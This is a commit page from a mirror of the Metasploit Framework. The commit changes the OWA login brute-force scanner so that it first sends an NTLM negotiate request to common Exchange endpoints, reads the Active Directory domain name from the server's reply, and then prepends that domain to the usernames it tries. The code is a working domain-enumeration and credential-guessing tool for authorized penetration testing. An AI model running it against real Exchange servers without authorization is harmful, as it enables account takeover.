infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Enumerate AD Domain via NTLM Authentication 

Add functionality to attempt an NTLM auth against common directories
to try to enumerate the AD domain. If a domain is found this will be
prepended to the authentication requests, otherwise it's business as
usual.
bug/bundler_fix
kaospunk 2013-08-22 12:26:14 -04:00
parent 0af2f1c611
commit cdcfa88fa3
1 changed files with 47 additions and 3 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

50
modules/auxiliary/scanner/http/owa_login.rb
View File

@ -6,6 +6,7 @@
## ##
require 'msf/core' require 'msf/core'
require 'rex/proto/ntlm/message'
class Metasploit3 < Msf::Auxiliary class Metasploit3 < Msf::Auxiliary
@ -25,7 +26,8 @@ class Metasploit3 < Msf::Auxiliary
'Vitor Moreira', 'Vitor Moreira',
'Spencer McIntyre', 'Spencer McIntyre',
'SecureState R&D Team', 'SecureState R&D Team',
'sinn3r' 'sinn3r',
'Brandon Knight'
], ],
'License' => MSF_LICENSE, 'License' => MSF_LICENSE,
'Actions' => 'Actions' =>
@ -82,6 +84,39 @@ class Metasploit3 < Msf::Auxiliary
end end
def run def run
urls = ["aspnet_client",
"Autodiscover",
"ecp",
"EWS",
"Microsoft-Server-ActiveSync",
"OAB",
"PowerShell",
"Rpc"]
domain = nil
begin
urls.each { |url|
res = send_request_cgi({
'encode' => true,
'uri' => "/#{url}",
'method' => 'GET',
'headers' => {"Authorization" => "NTLM TlRMTVNTUAABAAAAB4IIogAAAAAAAAAAAAAAAAAAAAAGAbEdAAAADw=="}
}, 25)
if res.code == 401 and res['WWW-Authenticate'].match(/^NTLM/i)
hash = res['WWW-Authenticate'].split('NTLM ')[1]
domain = Rex::Proto::NTLM::Message.parse(Rex::Text.decode_base64(hash))[:target_name].value().gsub(/\0/,'')
print_good("Found target domain: " + domain)
break
end
}
rescue ::Rex::ConnectionError, Errno::ECONNREFUSED, Errno::ETIMEDOUT
print_error("#{msg} HTTP Connection Failed, Aborting")
return :abort
end
# Store the original setting # Store the original setting
@blank_passwords_setting = datastore['BLANK_PASSWORDS'] @blank_passwords_setting = datastore['BLANK_PASSWORDS']
@ -116,14 +151,22 @@ class Metasploit3 < Msf::Auxiliary
begin begin
each_user_pass do |user, pass| each_user_pass do |user, pass|
vprint_status("#{msg} Trying #{user} : #{pass}") vprint_status("#{msg} Trying #{user} : #{pass}")
try_user_pass(user, pass, auth_path, inbox_path, login_check, vhost) try_user_pass({"user" => user, "pass"=>pass, "domain" => domain, "auth_path"=>auth_path, "inbox_path"=>inbox_path, "login_check"=>login_check, "vhost"=>vhost})
end end
rescue ::Rex::ConnectionError, Errno::ECONNREFUSED rescue ::Rex::ConnectionError, Errno::ECONNREFUSED
print_error("#{msg} HTTP Connection Error, Aborting") print_error("#{msg} HTTP Connection Error, Aborting")
end end
end end
def try_user_pass(user, pass, auth_path, inbox_path, login_check, vhost) def try_user_pass(opts)
domain = opts["domain"]
user = opts["user"]
pass = opts["pass"]
auth_path = opts["auth_path"]
inbox_path = opts["inbox_path"]
login_check = opts["login_check"]
vhost = opts["vhost"]
user = domain + '\\' + user if domain
user = datastore['AD_DOMAIN'] + '\\' + user if datastore['AD_DOMAIN'] != '' user = datastore['AD_DOMAIN'] + '\\' + user if datastore['AD_DOMAIN'] != ''
headers = { headers = {
'Cookie' => 'PBack=0' 'Cookie' => 'PBack=0'
@ -211,3 +254,4 @@ class Metasploit3 < Msf::Auxiliary
end end
end end